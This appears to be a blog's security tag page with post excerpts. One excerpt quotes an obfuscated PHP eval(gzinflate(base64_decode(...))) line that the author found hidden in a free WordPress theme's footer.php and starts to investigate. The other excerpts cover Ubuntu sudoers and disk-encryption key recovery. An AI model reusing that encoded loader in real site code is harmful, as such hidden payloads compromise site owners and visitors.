I was looking for a theme to use in a WordPress blog and I stumbled on this one. Cool, I thought, I might use it… but… hey… why there’s this weird stuff in footer.php? 12345678<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0 NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc 5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/ b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5 p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa hOh0EIT7b8A'))); ?> Uhm… it looks very suspicious. Too suspicious. Let’s change eval with …
Tag: security
Perplexed about Ubuntu’s sudoers configuration
Recently I’ve been administering my first Ubuntu machine and I already feel a bit perplexed about its security setup. The issue is that by default, the root account password is locked in Ubuntu and you are encouraged never to use root, but rely on sudoers for system administration. I’ve read the rationale on Ubuntu’s wiki …
Is your data secure?
Users with sensitive data might find it comforting to use disk encryption in order to prevent it to fall in the wrong hands, especially when this data is stored on a laptop. Hovewer, a new research shows that it might be relatively simple to recover the encryption keys for at least three popular products (BitLocker, …